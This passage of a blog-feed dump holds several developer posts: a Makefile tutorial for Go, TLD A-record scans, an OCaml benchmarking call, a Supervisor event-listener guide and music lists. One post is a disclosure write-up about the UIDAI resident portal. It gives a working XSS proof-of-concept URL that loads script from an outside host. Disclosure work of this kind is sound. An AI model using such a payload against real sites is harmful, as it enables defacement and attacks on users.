A target can be a file or an action to be performed (more on that later).\nThis is what a rule looks like in a Makefile:\ntarget: dependencies\n    recipe\nWhen you run make target, make searches for the rule which begins with this target and executes the dependencies (if required). It then runs the commands listed in the recipe. An important thing to understand here is that make tracks the dependencies by their last modified time. So if the dependencies haven’t changed, make will complain with make: 'target' is up to date.\nEnough of theory, let’s get our feet wet by writing our first Makefile. One important thing about Makefile is that you need to use tabs and not spaces. It is one of the rare *nix programs which is whitespace aware, and this has been mentioned in The Unix-Haters Handbook as well.\nTo begin with, let’s write a simple rule which removes any temporary object files using go clean and the previous binary file using good ol’ rm:\nclean:\n\tgo clean\n\trm -f sample.bin\nThe target here is clean. There is something special going on here though. What if we have a file called clean in our source directory? Let us try to run make clean now.\nOur directory structure:\n.\n├── Makefile\n├── clean\n└── sample.bin\nOn running make clean:\nmake: `clean' is up to date.\nEvery target in a Makefile is a file target by default. In our case clean is a file target and make tries to build this file clean, but since we already have a file with the same name clean in our directory, make is complaining there’s nothing to do.\nMoreover, in this case our rule is more of an action than a way to build files. For all such scenarios, make provides an easy way to instruct it to just run the rule and ignore any filename in our directory. This is called a PHONY target, which is a special kind of target. PHONY is just a way in make to forcefully run a target and not care about generating files. Our aim with this rule is to run 2 commands and that’s about it. So this is the perfect example for using PHONY.\nWe can add a .PHONY target to our Makefile simply with this line:\n.PHONY : clean\n\nclean:\n\tgo clean\n\trm -f sample.bin\n\nNow when we run make clean we get our expected output:\ngo clean\nrm -f sample.bin\nLet us extend our Makefile to do some common tasks:\n.PHONY : build run fresh test clean\n\ntest:\n\tgo test\n\nbuild:\n\tgo build\n\nrun:\n\t.\u002Fsample.bin\n\nclean:\n\tgo clean\n\trm -f sample.bin\nIf you have worked on any Golang project, these are very trivial actions. You will soon realise the power of Makefile when you have to do these steps repeatedly. Some people might argue that you can use aliases or simple shell scripts for the same. I vehemently disagree with that. The reason is that make is a much more powerful tool than a mere command runner. make has support for dependency tracking, and it will only rebuild whatever is required. If you are working on a huge project where the build times are to the tune of hours, you will soon realise why shell scripts are inferior. Of course, someone can point out that they could write a shell script to do even that, by fetching the last modified time, but why do the extra work when there’s an existing tried and tested tool? make also has support for parallel task execution, so you can just pass the flag -j {num} to make and it will run up to {num} jobs in parallel. 
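For instance (GNU make; nproc is just a convenient way to get the CPU count):\nmake -j 4    # run up to 4 independent recipes at once\nmake -j \"$(nproc)\"    # size the job count to the machine\nNote that recipes run this way must not depend on each other’s side effects, or the ordering becomes unsafe.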
All these benefits will be apparent for larger projects, but it is a good habit to write a Makefile even for smaller projects.\n\nWe will now make our Makefile a bit more sophisticated and introduce variables. If you want to custom-name your binary or inject variables at compile time, you can declare variables, for example:\nBIN := my-awesome-pro.bin\nHASH := $(shell git rev-parse --short HEAD)\nCOMMIT_DATE := $(shell git show -s --format=%ci ${HASH})\nBUILD_DATE := $(shell date '+%Y-%m-%d %H:%M:%S')\nVERSION := ${HASH} (${COMMIT_DATE})\nWe can modify our Makefile to use these variables:\nbuild:\n\tgo build -o ${BIN} -ldflags=\"-X 'main.buildVersion=${VERSION}' -X 'main.buildDate=${BUILD_DATE}'\"\n\nrun:\n\t.\u002F${BIN}\n\ntest:\n\tgo test\n\nclean:\n\tgo clean\n\trm -f ${BIN}\nWe can auto-version our builds and pass variables at build time to the Go linker with the -X flag. That’s really neat: now whenever we do a make build we get a new version of the build automagically.\nSo now we have a working Makefile which helps us with trivial things, but every time we need to change something in our program and check it, we still need to do these steps manually: make clean, make build and make run. Won’t it be awesome if we could tell Makefile to do all this with just one command? Programmers are lazy creatures after all.\nIn the beginning we saw that a target is composed of a recipe and dependencies. So we can just create a new PHONY target with these dependencies and, optionally, a recipe.\nfresh: clean build run\nWe created a new target which depends on clean to run first, then build and finally run. So every time we make a change in our Go program, all we need to run is make fresh. Awesome, isn’t it?\nWe will finally add our last target, which is a highly opinionated way of generating binaries for different OSes and architectures.\nprod:\n\tgoreleaser --rm-dist --snapshot\n\tcp dist\u002Flinux_amd64\u002F${BIN}-linux.bin .\n\trm -rf dist\nThis target runs goreleaser, which is a build automation tool. It then copies the required linux binary to the source directory and removes all the other junk.\nYou can even extend your Makefile to commit files to a repo, rsync these binaries to the production server or initiate your CI\u002FCD build process. The reason I like Makefile is that it serves as living documentation for your project on how to build\u002Fdeploy it, making it easier for new contributors to get started.\nSome additional information#\nIf you run make without passing any target name, make will run the first target present in the Makefile. To override this, set .DEFAULT_GOAL to the target you want as the default.\n.PHONY is just one way to tell make that it is a special kind of target; you can also do the same by creating a target without any recipe. Read this to know more.\nTo know more about Makefile, you can read the manual here.\nI hope you now appreciate Makefile and try it out in your next project. 
I’d love feedback on this blog post, do reach out to me on twitter or email\nFin!",[],{"slug":2480,"title":2481,"link":2482,"pubDate":2483,"contentSnippet":2484,"tags":2485,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"aadhaar-disclosure","Aadhaar Vulnerability Public Disclosure","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2018\u002F09\u002F15\u002Faadhaar-disclosure\u002F","2018-09-15T00:00:00.000Z","The Vulnerability\nThe UIDAI Resident Portal (with read access to the entire Aadhaar Demographic data) is running a vulnerable version\nof LifeRay software. It is running LifeRay 6.1, which was declared End-of-Life in February 2016.\nThis release includes multiple known vulnerabilities, including:\nAn XSS issue, for which a PoC can be found at resident.uidai.gov.in (Picture Credits: @sanitarypanels)\nMultiple RCEs: See issue-62, for example.\nIn fact the release is so old it does not even appear on the “Known Vulnerabilities” page on the LifeRay website; you have to go look at their Archived Vulnerabilities.\nThe PoC\nYou can find a simple Proof of Concept for the XSS issue at resident.uidai.gov.in.\nThe cdn_host parameter injects javascript from $CDN_HOST\u002FResident-theme\u002Fjs\u002Fcustom.js, in this case https:\u002F\u002Fscan.bb8.fun\u002FResident-theme\u002Fjs\u002Fcustom.js which hosts a small snippet to overwrite the HTML of the page.\nIt shows up like:\n\nFun\nThe current script allows for embedding any tweet using a tweet parameter. To embed:\nGo to any tweet, copy the part after twitter.com and pass it as the tweet parameter. For example, to embed this tweet:\nBreaking: Exclusive footage from inside @UIDAI's IT department after media reports of Aadhaar data leaks. pic.twitter.com\u002FW7m9L0HvEX\n— Aadhaar Compound Wall (@13footwall) March 29, 2018\nLook at the URL: https:\u002F\u002Ftwitter.com\u002F13footwall\u002Fstatus\u002F979301578686345216\nCopy 13footwall\u002Fstatus\u002F979301578686345216 and pass it as the tweet parameter:\nThe URL becomes https:\u002F\u002Fresident.uidai.gov.in\u002F?cdn_host=https:\u002F\u002Fscan.bb8.fun&tweet=13footwall\u002Fstatus\u002F979301578686345216\nSHARE IT\nThe Report\nI initially reported this to help@uidai.gov.in in Jan 2017:\n\nForgot all about it till Jan 2018, when someone mentioned I should try my luck with CERT-IN instead:\n\nUpdate\nThere is some confusion regarding which version of LifeRay\nUIDAI is running. They seem to be running 6.1.1, released on 2013-02-26.\nThe exact version is not relevant to the fact that UIDAI is:\nrunning an unsupported release\nwhich is 5 years old\nnot updating it despite being notified multiple times\n0800 16-Sep: UIDAI seems to have patched the issue by putting a block on the cdn_host parameter. This still leaves them exposed to multiple vulnerabilities until they update to a supported release.\nTimeline\nThe vulnerability is still not fixed. Here is a complete timeline:\n16 Jan 2017: Initially reported to help@uidai.gov.in. No response\n21 Jan 2018: Reported to ceo@uidai.gov.in and info@cert-in.org.in. No response\n19 Feb 2018: Reminder sent to ceo@uidai.gov.in and info@cert-in.org.in\n19 Feb 2018: Acknowledgement from CERT\n15 Mar 2018: Reminder sent. No response\n17 Mar 2018: Notified NCIIPC\n18 Mar 2018: Confirmation from NCIIPC asking for more details. 
I replied back with a quote of the previous exchange\n19 Mar 2018: Confirmation from NCIIPC thanking me for the report.\n19 Apr 2018: Reminder sent to UIDAI asking for acknowledgement\n30 May 2018: Reminder sent to NCIIPC and CERT asking for updates\nThe only change that I’m aware of since my initial report is that the website stopped declaring the LifeRay version in an HTTP response header.",[],{"slug":2487,"title":2488,"link":2489,"pubDate":2490,"contentSnippet":2491,"tags":2492,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"1543-multicore-ci","Continuous Benchmarking & Call for Benchmarks","https:\u002F\u002Fkcsrk.info\u002Fmulticore\u002Focaml\u002Fbenchmarks\u002F2018\u002F09\u002F13\u002F1543-multicore-ci\u002F","2018-09-13T15:43:00.000Z","Over the past few weeks, at OCaml Labs, we’ve deployed\ncontinuous benchmarking infrastructure for Multicore\nOCaml. Live results are available\nat http:\u002F\u002Focamllabs.io\u002Fmulticore. Continuous\nbenchmarking has already enabled us to make informed\ndecisions about the\nimpact of our changes, and should come in handy over the next few months as\nwe polish off and tune the multicore runtime.\nCurrently, the benchmarks are all single-threaded and run on x86-64. Our current\naim is to quantify the performance impact of running single-threaded OCaml\nprograms using the multicore compiler. Moving forward, we would include\nmulti-threaded benchmarks and other architectures.\nThe benchmarks and the benchmarking infrastructure were adapted from OCamlPro’s\nbenchmark suite aimed at\nbenchmarking Flambda optimisation passes.\nThe difference with the new infrastructure is that all the data is generated as\nstatic HTML and CSV files, with data processing performed on the client side in\nJavaScript. I find the new setup easier to manage and deploy.\nQuality of benchmarks\nIf you observe the results, you will see that multicore is slower than\ntrunk OCaml on menhir-standard and menhir-fancy. But if you look closely:\n\nthese benchmarks complete in less than 10 milliseconds. This is not enough time\nto faithfully compare the implementations, as constant factors such as runtime\ninitialisation and the cost of a single untimely major GC dominate any useful work.\nIn fact, almost half of the benchmarks complete within a second. The quality of\nthis benchmark suite ought to be improved.\nCall for benchmarks\nWhile we want longer running benchmarks, we would also like those benchmarks to\nrepresent real OCaml programs found in the wild. If you have long-running real\nOCaml programs, please consider adding them to the benchmark suite. Your\ncontribution will ensure that performance-oriented OCaml features such as\nmulticore and flambda are evaluated on representative OCaml programs.\nHow to contribute\nMake a PR to the multicore branch of\nocamllabs\u002Focamlbench-repo.\nThe packages directory contains many examples of how to prepare programs for\nbenchmarking. Among these, numerical-analysis-bench and menhir-bench are\nsimple and illustrative.\nThe benchmarks themselves are run using these\nscripts.\nDockerfile\nThere is a handy Dockerfile to test the benchmarking setup:\n$ docker build -t multicore-cb -f Dockerfile . #takes a while; grab a coffee\n\n\nThis builds the docker image for the benchmarking infrastructure. 
You can run\nthe benchmarks as:\n$ docker run -p 8080:8080 -it multicore-cb bash\n$ cd ~\u002Focamlbench-scripts\n$ .\u002Frun-bench.sh --nowait --lazy #takes a while; grab lunch\n\n\nYou can view the results by:\n$ cd ~\u002Flogs\u002Foperf\n$ python -m SimpleHTTPServer 8080\n\n\nNow on your host machine, point your browser to localhost:8080 to\ninteractively visualise the benchmark results.\nCaveats\nAim to get your benchmark compiling with OCaml 4.06.1. You might have trouble\ngetting your benchmark to compile with the multicore compiler due to several\nreasons:\nMulticore compiler has syntax extensions for algebraic effect\nhandlers\nwhich breaks packages that use ppx.\nMulticore compiler has a different C\nAPI which breaks core dependencies\nsuch as Lwt.\nCertain features such as marshalling closures and custom tag objects are\nunimplemented.\nIf you encounter trouble submitting benchmarks, please make an issue on\nkayceesrk\u002Focamlbench-scripts repo.",[],{"slug":2494,"title":2495,"link":2496,"pubDate":2497,"contentSnippet":2498,"tags":2499,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"tld-a-records","A records on top level domains","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2018\u002F08\u002F18\u002Ftld-a-records\u002F","2018-08-18T00:00:00.000Z","A few more changes since the last time I ran this.\nUpdate: An automatically updated version of this is available at https:\u002F\u002Fcaptnemo.in\u002Ftld-a-record\u002F\nTLD\n      IP\n      Web\n    \nai\n      209.59.119.34\n      [http] [https]\n    \narab\n      127.0.53.53\n      [http] [https]\n    \nbh\n      88.201.27.211\n      [http] [https]\n    \ncharity\n      127.0.53.53\n      [http] [https]\n    \ncm\n      195.24.205.60\n      [http] [https]\n    \ndk\n      193.163.102.58\n      [http] [https]\n    \ngg\n      87.117.196.80\n      [http] [https]\n    \ninc\n      127.0.53.53\n      [http] [https]\n    \nje\n      87.117.196.80\n      [http] [https]\n    \npa\n      168.77.8.43\n      [http] [https]\n    \npn\n      80.68.93.100\n      [http] [https]\n    \npolitie\n      127.0.53.53\n      [http] [https]\n    \ntk\n      217.119.57.22\n      [http] [https]\n    \nuz\n      91.212.89.8\n      [http] [https]\n    \nws\n      64.70.19.33\n      [http] [https]\n    \nмон\n      202.170.80.40\n      [http] [https]\n    \nмон\n      218.100.84.27\n      [http] [https]\n    \nмон\n      180.149.98.78\n      [http] [https]\n    \n政府\n      127.0.53.53\n      [http] [https]\n    \nعرب\n      127.0.53.53\n      [http] [https]\n    \nDiff:\n\n+bh\n+charity\n-etisalat\n+inc\n-اتصالات\n-招聘\n 政府",[],{"slug":2501,"title":2502,"link":2503,"pubDate":2504,"contentSnippet":2505,"tags":2506,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"jfp-effect-handlers","JFP Special Issue on Algebraic Effects and Handlers","https:\u002F\u002Fkcsrk.info\u002Fhandlers\u002Fpaper\u002F2018\u002F08\u002F16\u002Fjfp-effect-handlers\u002F","2018-08-16T09:09:00.000Z","Andrej Bauer and I are editing a special issue of JFP\non the theory and practice of algebraic effects and handlers. 
The CfP is below.\n\nCALL FOR PAPERS\n\nJFP Special Issue\non\nThe Theory and Practice of Algebraic Effects and Handlers\n\nSubmission Deadline: 18 January 2019\nExpected Publication Date: December 2019\n\n\nScope\nAn important aspect of real-world languages is their support for computational\neffects such as raising exceptions, printing to the screen, accessing a\ndatabase, non-determinism, and concurrency. In order to reason about the\nsemantics of a programming language with computational effects, it is necessary\nto separate the effects out from the rest of the language. To this end, algebraic\neffects permit a wide class of computational effects to be specified in a pure\nsetting using only operations that give rise to them and equations that the\noperations satisfy. The algebraic treatment of operations naturally leads to a\nnovel treatment of handlers for all computational effects, not just for\nexceptions.\nAlgebraic effect handlers have been steadily gaining attention as a programming\nlanguage feature since they generalise many control-flow abstractions such as\nexception handling, iterators, async\u002Fawait, or backtracking, while ensuring\nthat the composition of various features remains well-behaved. Indeed, there\nare implementations of algebraic effects and effect handlers as libraries in C,\nClojure, F#, Haskell, OCaml, Scala, JavaScript, as well as full-fledged\nlanguages such as Eff, Frank, Links, Koka, and Multicore OCaml. Algebraic effect\nhandlers have also influenced the design of software tools in industry\nincluding Facebook’s React UI library and Uber’s Pyro probabilistic programming\nlanguage.\nTo recognise and encourage the publication of mature research contributions in\nthis area, a special issue of the Journal of Functional Programming (JFP) will\nbe devoted to the same theme.\nTopics\nFull-length, archival-quality submissions are solicited on theoretical and\npractical aspects of algebraic effects and handlers. Examples\ninclude, but are not limited to:\nReasoning about algebraic effects and handlers (denotational semantics,\ndependent types, logical relations, language support for equational reasoning)\nEffect typing (subtyping, row-polymorphism, generativity, encapsulation)\nImplementation of effect handlers (dynamic effects, selective CPS\ntranslations, delimited continuations)\nApplications of algebraic effect handlers (probabilistic programming, event\ncorrelation, meta-programming, asynchronous I\u002FO, debugging)\n\nReports on applications of these techniques to real-world problems are\nespecially encouraged, as are submissions that relate ideas and concepts from\nseveral of these topics, or bridge the gap between theory and practice.\nPapers will be reviewed as regular JFP submissions, and acceptance in the\nspecial issue will be based on both JFP’s quality standards and relevance to\nthe theme. The special issue also welcomes high-quality survey and position\npapers that would benefit a wide audience.\nAuthors are encouraged to indicate interest in submitting by December 14,\n2018, to aid in identifying suitable reviewers. The submission deadline is\nJanuary 18, 2019. The expected submission length is 25-35 pages, excluding\nbibliography and appendices. 
Shorter submissions are encouraged; prospective authors of longer submissions should discuss their plans with the special issue editors in advance.\nSubmissions that are based on previously-published conference or workshop papers must clearly describe the relationship with the initial publication, and must differ sufficiently that the author can assign copyright to Cambridge University Press. Prospective authors are welcome to discuss such submissions with the editors to ensure compliance with this policy.\nSubmissions\nSubmissions should be sent through the JFP Manuscript Central system at https:\u002F\u002Fmc.manuscriptcentral.com\u002Fcup\u002Fjfp_submit.\nChoose “Effects and Handlers” as the paper type, so that it gets assigned to the special issue.\nFor other submission details, please consult an issue of the Journal of Functional Programming or see the Journal’s web page at http:\u002F\u002Fjournals.cambridge.org\u002Fjid_JFP.\nTentative Schedule\n14 December 2018: Expression of interest\n18 January 2019: Submission deadline\n22 April 2019: First round of reviews\n23 August 2019: Revision deadline\n15 November 2019: Second round of reviews\n13 December 2019: Final accepted versions due\nGuest Editors\nAndrej Bauer, Faculty of Mathematics and Physics, University of Ljubljana\nKC Sivaramakrishnan, Department of Computer Science and Technology, University of Cambridge\nEditors in Chief\nJeremy Gibbons, Department of Computer Science, University of Oxford\nMatthias Felleisen, College of Computer and Information Science, Northeastern University",[],{"slug":2508,"title":2509,"link":2510,"pubDate":2511,"contentSnippet":2512,"tags":2513,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"biweekly-music-part-4","Bi-Weekly Music Post Part 4","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fbiweekly-music-part-4\u002F","2018-07-28T15:40:55.000Z","I am writing this post exactly 30 days after the last one; I got caught up with some work and couldn’t write a new post, apologies! To make up for the delay, I have some absolutely gold reccos this time which I believe you will like.\nIsaac Gracie - reverie#\n\nTash Sultana - Jungle#\n\n18th Dec - Tienas#\n\nPareek - Ariana and Amrina, Coke Studio Explorer 2018#\n\nWhen The Curtain Falls - Greta Van Fleet#\n\nPoppy Ackroyd - Paper#\n\nNothing Personal - Night Riots#\n\nDo reach out to me @mrkaran_ with your dose of music reccos.\nFin!",[],{"slug":2515,"title":2516,"link":2517,"pubDate":2518,"contentSnippet":2519,"tags":2520,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"biweekly-music-part-3","Bi-Weekly Music Post Part 3","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fbiweekly-music-part-3\u002F","2018-06-28T16:00:55.000Z","For the past week, I’ve been having trouble connecting to Spotify from India, and my #1 source for discovering music is gone.\nI’ve started using Saavn, but it has crappy recommendations and too much "Bollywoody"\u002Fcrap shit thrown all over. Also, it requires location access to suggest new music. LOL, is this a joke or what?
Like seriously, I can’t think of a single reason why an ML algo would need my location to suggest music.\nAnyway, this week’s recommendations might be a bit more “Desi”, as I’ve discovered some real good bands from our country and our beloved neighbours (of course!)\nMist of Capricorn - Agam#\n\nRangapura Vihaara - Agam#\n\nToh Phir Aao - Levi’s Live Session 7 by Mustafa Zahid & ROXEN#\n\nAankhon Kay Sagar - Shafqat Amanat Ali, Coke Studio Pakistan, Season 2#\n\nHit Me Up - The PropheC#\n\nTareefan Reprise - Lisa Mishra#\n\nMessage In A Bottle - The Police#\n\nAgnes - Glass Animals#\n\nPsycho Killer - Talking Heads#\n\nDo reach out to me @mrkaran_ with your dose of music reccos.\nFin!",[],{"slug":2522,"title":2523,"link":2524,"pubDate":2525,"contentSnippet":2526,"tags":2527,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"biweekly-music-part-2","Bi-Weekly Music Post Part 2","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fbiweekly-music-part-2\u002F","2018-06-14T07:00:55.000Z","I’ve looped through Nescafe Basement like 100 times in the past two weeks and still can’t get enough of it. This is the kind of music I like, the kind that just grows on you until you loop endlessly and then hate it.\nAnyway, the following is a list of songs that I have discovered and liked the most in the past two weeks.\nTattva - aswekeepsearching#\n\nKoothu Over Coffee - Agam#\n\nTere Ishq Mein Jo Bhi - Nescafe Basement#\n\nHoundmouth - Sedona#\n\nHeavy - Collective Soul#\n\nThe Youth - George Taylor#\n\nPorcupine - Pigeons Playing Ping Pong#\n\nMisirlou - Ashar Kazi & Shruti Naik (cover)#\n\nRedbone - Childish Gambino (ukulele cover)#\n\nDo reach out to me @mrkaran_ with your dose of music reccos.\nFin!",[],{"slug":2529,"title":2530,"link":2531,"pubDate":2532,"contentSnippet":2533,"tags":2534,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"supervisor-notifications","Receiving notifications from Supervisor","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fsupervisor-notifications\u002F","2018-06-03T05:27:55.000Z","Supervisor Events#\nI had a seemingly simple task: to receive a notification any time a process managed by Supervisor restarts. I wanted a generic solution where I could get notifications for any change in process state. Supervisor Events saved my day, although I would admit it wasn’t straightforward to set up.\nSupervisor uses an STDIN\u002FSTDOUT mechanism to communicate with the event listener. You need to configure your event listener in such a way that it can understand the STDIN sent by Supervisor and also communicate back using STDOUT. You can write this event handler in any language you like, as long as you conform to the specially formatted messages that Supervisor sends and expects. I struggled the most at this step, and my google-fu didn’t help much here.\nSupervisor by default will send these events even if no listener is configured. Once you have your own listener set up, you can execute any task you want, e.g. send email\u002Ftelegram\u002Fslack messages etc.\nIn order to configure your event listener, you need to add it to your supervisor.conf.
Here’s an example configuration:\n[eventlistener:wowevent]\ncommand=\u002Fhome\u002Fwork\u002Ftestevent\u002Ftest.py\nevents=PROCESS_STATE_STARTING\nprocess_name=%(program_name)s_%(process_num)s\nnumprocs=1\nautorestart=true\nstderr_logfile=\u002Fhome\u002Fwork\u002Ftestevent\u002Flogs\u002Fevent_err.log\nstdout_logfile=\u002Fhome\u002Fwork\u002Ftestevent\u002Flogs\u002Fevent.log\nFor the program to know that it has to send a notification to the wowevent pool, you need to add the events key to the program section of supervisor.conf.\n[program:myprog]\n...\nevents=PROCESS_STATE_STARTING\n...\nNow, every time myprog is about to start, it will send an event to the wowevent event pool. Your event listener, which is configured at \u002Fhome\u002Fwork\u002Ftestevent\u002Ftest.py, will handle the notification and execute the tasks you want to perform.\nThere are a bunch of event states that Supervisor captures. I was interested in knowing when my process had started, so I used PROCESS_STATE_RUNNING. You can take a look at all the different event types here.\nDuring all this experimentation I came across a bug (which I later found is a known issue, and a bug that has been open for 4 years now). If you’ve been using Supervisor, I am sure you’ve been bitten at least once by not rereading the config file and wondering why Supervisor isn’t picking up config changes when you restart it. So reread and update becomes muscle memory after that.\nThe bug with events is that if you make any changes to the event group, reread doesn’t pick up the change. I initially thought this must be standard Supervisor behaviour, because I hadn’t changed any program group. I randomly decided to change the event listener name and BAM! Supervisor read the new configuration and everything suddenly worked! ARGH. Why do complex problems have such simple solutions? (Not a solution, rather a workaround, but you get the drift, right?)\nSupervisor Event Listener Protocol#\nSupervisor sends a header, which is a set of key-value pairs of meta-attributes about the process and event. The header looks something like:\nver:3.0 server:supervisor serial:208 pool:mylistener poolserial:0 eventname:PROCESS_STATE_RUNNING len:69\nThe event listener mylistener starts out in the ACKNOWLEDGED state. From there, the listener sends READY to Supervisor; this is how the listener signals that it can receive an event such as PROCESS_STATE_RUNNING.\nWhen Supervisor dispatches the event, it puts the listener into the BUSY state, and here you can run your custom task. Supervisor waits for the task to get executed, and when it does, the listener needs to communicate the result back.
This process is one full request-response cycle.\nLet us write a simple Python script which will listen to Supervisor event notifications and communicate back, all in a protocol Supervisor understands.\nimport sys\nimport requests  # handy if notify_user below calls an HTTP API\n\nimport logging\nlogger = logging.getLogger('event_listener')\nhandler = logging.FileHandler('\u002Fhome\u002Fuser\u002Fprod\u002Fevents\u002Flogs\u002Fresponse.log')\nformatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\nlogger.setLevel(logging.DEBUG)\nHere I am just setting up a basic logging structure, since I want to keep the stdout messages separate from what Supervisor uses.\ndef write_stdout(s):\n    # only eventlistener protocol messages may be sent to stdout\n    sys.stdout.write(s)\n    sys.stdout.flush()\n\ndef write_stderr(s):\n    sys.stderr.write(s)\n    sys.stderr.flush()\nWe have written helper functions which will be used to communicate with Supervisor. Now comes the main part (sorry for the bad pun!):\ndef notify_user():\n    # placeholder handler: send an email, hit an API, post to slack, etc.\n    logger.info('process state changed')\n\ndef main():\n    while 1:\n        # Hey Supervisor, I'm ready for some action\n        write_stdout('READY\\n')\n\n        # Reading the header from STDIN\n        line = sys.stdin.readline()\n        write_stderr(line)\n\n        # read event payload and print it to stderr\n        headers = dict([ x.split(':') for x in line.split() ])\n        data = sys.stdin.read(int(headers['len']))\n        write_stderr(data)\n\n        # add your events here\n        notify_user()\n\n        # transition from BUSY back to ACKNOWLEDGED\n        write_stdout('RESULT 2\\nOK')\n        logger.debug(\"It's all fine and dandy\")\n\nif __name__ == '__main__':\n    main()\nLet us break this into pieces.\nwrite_stdout('READY\\n')\nWe flush READY with a linefeed character (\\n) to STDOUT. When Supervisor dispatches an event to mylistener, it will put the listener into the BUSY state.\nline = sys.stdin.readline()\nwrite_stderr(line)\nline would be the header which we discussed previously.\ndata = sys.stdin.read(int(headers['len']))\nThis part is interesting. Here, we capture the len key from the header and read that many characters from STDIN. The data consists of our event payload.\nThe event payload looks something like:\nprocessname:prog-restartv3_0 groupname:prog-restartv3 from_state:STOPPED tries:0\n(followed on STDIN by the header of the next event, e.g. ver:3.0 server:supervisor serial:25 pool:prog-restartv3 poolserial:3 eventname:PROCESS_STATE_STARTING len:76)\nnotify_user()\nThis is the handler where you can send an email, send a request to an API, log to a file, etc.\nwrite_stdout('RESULT 2\\nOK')\nFinally, we tell Supervisor to move the listener from the BUSY to the ACKNOWLEDGED state by sending a result structure. The result can be OK or FAIL, and you need to send RESULT followed by the length of the result payload. For OK you send RESULT 2\\nOK, but for FAIL you have to send RESULT 4\\nFAIL.\nThat’s pretty much all you need to start receiving notifications from Supervisor every time your program changes its state.
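Since the length prefix is easy to get wrong when hard-coded, a tiny helper can derive it from the payload itself. This is my own sketch, not from the original post (the send_result name is hypothetical); it reuses the write_stdout helper from the script above:\ndef send_result(result):\n    # result is 'OK' or 'FAIL'; the protocol expects 'RESULT <len>\\n<payload>'\n    write_stdout('RESULT %d\\n%s' % (len(result), result))\n\nsend_result('OK')    # writes RESULT 2\\nOK\nsend_result('FAIL')  # writes RESULT 4\\nFAIL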
If you found this article useful, I’d love it if you shared it on Twitter or Facebook and let your friends know about it too.",[],{"slug":2536,"title":2537,"link":2538,"pubDate":2539,"contentSnippet":2540,"tags":2541,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"google-tld-no-more-a-records","Google owned TLDs don't have A records any more","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2018\u002F06\u002F02\u002Fgoogle-tld-no-more-a-records\u002F","2018-06-02T00:00:00.000Z","A little while ago (Jan 2018), I ran a scan to see which TLDs have an A record set (on the TLD itself). This is what lets you visit http:\u002F\u002Fai\u002F as a valid website in your browser, for eg.\nI ran the same scan as http:\u002F\u002Fblog.towo.eu\u002Fa-records-on-top-level-domains\u002F (link is down, archived) and the results are at https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2018\u002F02\u002F09\u002Ftld-a-records\u002F.\nDecided to re-run the scan today, and noticed a stark difference: a lot of Google-owned TLDs which were earlier pointing to 127.0.53.53 don’t have an A record anymore.\nScan run from AS45609.\nResults:\nTLD | IP | Web\nai | 209.59.119.34 | [http], [https]\narab | 127.0.53.53 | Private IP\ncm | 195.24.205.60 | [http], [https]\ndk | 193.163.102.58 | [http], [https]\netisalat | 127.0.53.53 | Private IP\ngg | 87.117.196.80 | [http], [https]\nje | 87.117.196.80 | [http], [https]\npa | 168.77.8.43 | [http], [https]\npn | 80.68.93.100 | [http], [https]\npolitie | 127.0.53.53 | Private IP\ntk | 217.119.57.22 | [http], [https]\nuz | 91.212.89.8 | [http], [https]\nws | 64.70.19.33 | [http], [https]\nмон | 218.100.84.27 | [http], [https]\nмон | 202.170.80.40 | [http], [https]\nмон | 180.149.98.78 | [http], [https]\nاتصالات | 127.0.53.53 | Private IP\n政府 | 127.0.53.53 | Private IP\nعرب | 127.0.53.53 | Private IP\n招聘 | 127.0.53.53 | Private IP\nComparing with the previous scan, these TLDs no longer have an A record:\n\n-android\n-cal\n-chrome\n-dclk\n-drive\n-gle\n-guge\n-hangout\n-nexus\n-play\n-sport\n-谷歌\n-グーグル\n\n\nThe majority of these are owned by Google. Not claiming it means anything, just a nice observation.\nUpdate: An automatically updated version of this is available at https:\u002F\u002Fcaptnemo.in\u002Ftld-a-record\u002F",[],{"slug":2543,"title":2544,"link":2545,"pubDate":2546,"contentSnippet":2547,"tags":2548,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"biweekly-music-part-1","Bi-Weekly Music Post Part 1","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fbiweekly-music-part-1\u002F","2018-05-28T15:00:55.000Z","I listen to a lot of music while working and otherwise, and I plan to share some of the gems I discover each week. Thanks to Spotify and YouTube suggestions, I keep discovering a lot of indie artists and underrated titles.
I hope you give them a listen and spread some good music in your circle.\nTere Jeya Hor Disda#\n\nAwari#\n\nMagpie Jay - Bigfoot#\n\nThe Local Train - Dilnawaz#\n\na-ha - Take On Me#\n\nLord Huron - The Night We Met#\n\nSnowmine - Let me in#\n\nGlass Animals - Pork Soda#\n\nIf you liked the above recommendations, or you want to share moar music which I should definitely listen to, tweet to me @mrkaran_\nFin!",[],{"slug":2550,"title":2551,"link":2552,"pubDate":2553,"contentSnippet":2554,"tags":2555,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"home-server-networking","Home Server Networking","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2018\u002F04\u002F22\u002Fhome-server-networking\u002F","2018-04-22T00:00:00.000Z","Next in the Home Server series, this post documents how I got the networking set up to serve content publicly from my under-the-tv server.\n\nBackground\nMy home server runs on a mix of Docker\u002FTraefik orchestrated via Terraform. The source code is at https:\u002F\u002Fgit.captnemo.in\u002Fnemo\u002Fnebula (self-hosted, dogfooding FTW!) if you wanna take a look.\nThe ISP is ACT Bangalore1. They offer decent bandwidth and I’ve been a 